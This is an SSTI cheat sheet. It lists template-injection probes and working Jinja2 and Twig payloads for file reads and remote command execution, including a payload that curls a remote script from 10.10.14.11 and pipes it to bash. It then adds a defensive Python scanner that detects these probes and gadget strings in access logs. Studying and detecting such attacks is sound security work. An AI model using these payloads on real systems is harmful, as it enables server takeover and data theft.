SSTI

Server-side Template Injection (SSTI) occurs when attacker-controlled input is embedded into a template that the server later renders, so any template syntax in the input is evaluated by the template engine instead of being treated as plain data.

Identify

# Check for return of 49
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
{7*7}
%{7*7}

Jinja2

# Config
{{ config.items() }}

# Globals
{{ self.__init__.__globals__.__builtins__ }}

# LFI
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

# RCE
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Jinja has a few kinds of delimiters, and the default ones are: {{ ... }} for expressions (evaluated and printed), {% ... %} for statements (control flow such as if/for), and {# ... #} for comments.

The payloads above use expressions; the payloads below use statements instead.

# Basic check
{% print(7*7) %}

# RCE
{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('curl http://10.10.14.11:81/rev.sh |bash')['read']() == 'chiv' %} a {% endif %}

Twig

# Get info
{{ _self }}

# Read file
{{ "/etc/passwd"|file_excerpt(1,-1) }}

# RCE
{{ ['id'] | filter('system') }}
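From the defender's side, the probe strings in the Identify section and the Jinja2/Twig gadget chains above are exactly what to look for in access logs. The following is an added example, not part of the original cheat sheet: it URL-decodes each log line, matches the 7*7 probes by syntax family, and flags the gadget fragments (__globals__, __builtins__, popen, _self, file_excerpt, ...) that mark an attempt that has moved past detection. The log lines are constructed samples.

```python
# Added example (not from the original page): spot the SSTI probes and the
# Jinja2/Twig gadget fragments listed above in web-server access logs.
import re
from urllib.parse import unquote_plus

# Identification probes from the cheat sheet, grouped by the syntax they use.
# One probe can match several families (e.g. ${{7*7}} also contains {{7*7}}).
PROBE_PATTERNS = {
    "jinja2/twig expression": r"\{\{\s*7\s*\*\s*7\s*\}\}",
    "jinja2 statement":       r"\{%\s*print\s*\(\s*7\s*\*\s*7\s*\)\s*%\}",
    "freemarker/velocity":    r"\$\{\{?\s*7\s*\*\s*7\s*\}?\}",
    "erb":                    r"<%=\s*7\s*\*\s*7\s*%>",
    "ruby/pug interpolation": r"#\{\s*7\s*\*\s*7\s*\}",
    "smarty":                 r"(?<![{$%#])\{\s*7\s*\*\s*7\s*\}",
    "ognl/struts":            r"%\{\s*7\s*\*\s*7\s*\}",
}
# Gadget fragments taken from the Jinja2 and Twig payloads above; any of these
# in a request parameter is far more serious than a bare 7*7 probe.
GADGETS = ["__globals__", "__builtins__", "__import__", "popen", "_self",
           "file_excerpt", "filter('system')", "config.items"]

def classify_request(raw_line: str) -> dict:
    """Return {'engines': [...], 'gadgets': [...]} for one access-log line.

    The line is URL-decoded first: probes are almost always percent-encoded
    on the wire (e.g. %7B%7B7*7%7D%7D for {{7*7}})."""
    decoded = unquote_plus(raw_line)
    engines = [name for name, pat in PROBE_PATTERNS.items() if re.search(pat, decoded)]
    gadgets = [g for g in GADGETS if g in decoded]
    return {"engines": engines, "gadgets": gadgets}

def scan_log(lines):
    """Yield (line_number, classification) for every line that looks like SSTI."""
    for n, line in enumerate(lines, 1):
        hit = classify_request(line)
        if hit["engines"] or hit["gadgets"]:
            yield n, hit

# Constructed sample log lines (not real traffic): one benign request,
# two probes and one Jinja2 globals-walk attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /profile?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 514',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /profile?name=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 520',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /profile?name=%7B%7B+self.__init__.__globals__.__builtins__+%7D%7D HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(n, hit)
```

A response body that contains "49" where the parameter was echoed, correlated with one of these hits, is the confirmation a detection rule should look for.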